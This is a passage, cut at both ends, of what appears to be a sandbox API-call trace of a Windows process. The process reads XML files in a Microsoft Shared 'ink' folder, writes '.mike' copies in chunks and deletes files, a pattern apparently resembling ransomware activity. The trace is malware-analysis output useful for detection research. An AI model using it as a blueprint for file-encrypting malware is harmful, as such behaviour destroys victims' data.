lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe46982c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe46982c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe46be420, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xaf0)) returned 1 [0043.985] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0043.985] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", lpFilePart=0x0) returned 0x3d [0043.985] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.mike", lpFilePart=0x0) returned 0x42 [0043.985] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml.mike")) returned 1 [0043.986] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", lpFilePart=0x0) returned 0x3d [0043.986] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", lpFilePart=0x0) returned 0x3d [0043.986] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", lpFilePart=0x0) returned 0x3d [0043.986] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0043.986] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0043.988] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0043.988] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", lpFilePart=0x0) returned 0x3d [0043.988] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0043.988] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.988] GetFileType (hFile=0x264) returned 0x1 [0043.988] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0043.988] GetFileType (hFile=0x264) returned 0x1 [0043.988] CloseHandle (hObject=0x264) returned 1 [0043.989] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", lpFilePart=0x0) returned 0x3d [0043.989] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", lpFilePart=0x0) returned 0x3d [0043.989] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0043.989] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0043.989] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0043.989] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0043.989] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.989] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml"), fInfoLevelId=0x0, lpFileInformation=0x221c1cc | out: lpFileInformation=0x221c1cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d7a859, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d7a859, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8c0)) returned 1 [0043.989] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.989] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", lpFilePart=0x0) returned 0x3d [0043.989] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.989] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml"), fInfoLevelId=0x0, lpFileInformation=0x221c4bc | out: lpFileInformation=0x221c4bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d7a859, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d7a859, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8c0)) returned 1 [0043.989] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.989] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", lpFilePart=0x0) returned 0x3d [0043.989] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.mike", lpFilePart=0x0) returned 0x42 [0043.989] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0043.990] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.990] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0043.990] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", lpFilePart=0x0) returned 0x3d [0043.990] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", lpFilePart=0x0) returned 0x3d [0043.990] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", lpFilePart=0x0) returned 0x3d [0043.990] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.mike", lpFilePart=0x0) returned 0x42 [0043.990] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0043.990] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.990] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0043.990] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.mike", lpFilePart=0x0) returned 0x42 [0043.990] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.990] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.991] GetFileType (hFile=0x264) returned 0x1 [0043.991] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.991] GetFileType (hFile=0x264) returned 0x1 [0043.991] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0043.991] WriteFile (in: hFile=0x264, lpBuffer=0x221d210*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x221d210*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0043.992] CloseHandle (hObject=0x264) returned 1 [0043.992] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0043.992] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml"), fInfoLevelId=0x0, lpFileInformation=0x221cd54 | out: lpFileInformation=0x221cd54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d7a859, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d7a859, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8c0)) returned 1 [0043.992] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0043.992] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", lpFilePart=0x0) returned 0x3d [0043.992] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.992] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.992] GetFileType (hFile=0x264) returned 0x1 [0043.992] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.992] GetFileType (hFile=0x264) returned 0x1 [0043.992] ReadFile (in: hFile=0x264, lpBuffer=0x221e324, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x221e324*, lpNumberOfBytesRead=0x2af0c8*=0x8c0, lpOverlapped=0x0) returned 1 [0043.995] CloseHandle (hObject=0x264) returned 1 [0043.995] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.mike", lpFilePart=0x0) returned 0x42 [0043.995] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.995] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.995] GetFileType (hFile=0x264) returned 0x1 [0043.995] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.995] GetFileType (hFile=0x264) returned 0x1 [0043.995] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0043.996] WriteFile (in: hFile=0x264, lpBuffer=0x22234b4*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x22234b4*, lpNumberOfBytesWritten=0x2af0bc*=0x8c0, lpOverlapped=0x0) returned 1 [0043.996] CloseHandle (hObject=0x264) returned 1 [0043.997] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.mike", lpFilePart=0x0) returned 0x42 [0043.997] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0043.997] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.997] GetFileType (hFile=0x264) returned 0x1 [0043.997] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0043.997] GetFileType (hFile=0x264) returned 0x1 [0043.998] WriteFile (in: hFile=0x264, lpBuffer=0x22266c8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x22266c8*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0043.998] CloseHandle (hObject=0x264) returned 1 [0043.999] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", lpFilePart=0x0) returned 0x3d [0043.999] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.mike", lpFilePart=0x0) returned 0x42 [0043.999] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0043.999] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe46be420, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe46be420, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe46e4580, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xae0)) returned 1 [0043.999] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0043.999] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", lpFilePart=0x0) returned 0x3d [0043.999] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.mike", lpFilePart=0x0) returned 0x42 [0043.999] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.999] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2227d78 | out: lpFileInformation=0x2227d78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe46be420, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe46be420, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe46e4580, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xae0)) returned 1 [0043.999] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.999] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", lpFilePart=0x0) returned 0x3d [0043.999] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", dwFileAttributes=0x80) returned 0 [0044.000] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", lpFilePart=0x0) returned 0x3d [0044.000] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.mike", lpFilePart=0x0) returned 0x42 [0044.001] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0044.001] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe46be420, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe46be420, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe46e4580, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xae0)) returned 1 [0044.001] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0044.001] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", lpFilePart=0x0) returned 0x3d [0044.001] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.mike", lpFilePart=0x0) returned 0x42 [0044.001] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml.mike")) returned 1 [0044.002] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", lpFilePart=0x0) returned 0x3d [0044.002] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", lpFilePart=0x0) returned 0x3d [0044.002] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", lpFilePart=0x0) returned 0x3d [0044.002] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0044.002] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0044.003] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0044.003] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", lpFilePart=0x0) returned 0x3d [0044.003] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0044.003] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.004] GetFileType (hFile=0x264) returned 0x1 [0044.004] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0044.004] GetFileType (hFile=0x264) returned 0x1 [0044.004] CloseHandle (hObject=0x264) returned 1 [0044.004] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", lpFilePart=0x0) returned 0x3d [0044.004] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", lpFilePart=0x0) returned 0x3d [0044.004] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0044.004] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0044.004] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0044.005] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0044.005] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0044.005] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml"), fInfoLevelId=0x0, lpFileInformation=0x2229cd8 | out: lpFileInformation=0x2229cd8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d7a859, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d7a859, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa54)) returned 1 [0044.005] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0044.005] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", lpFilePart=0x0) returned 0x3d [0044.005] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0044.005] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft 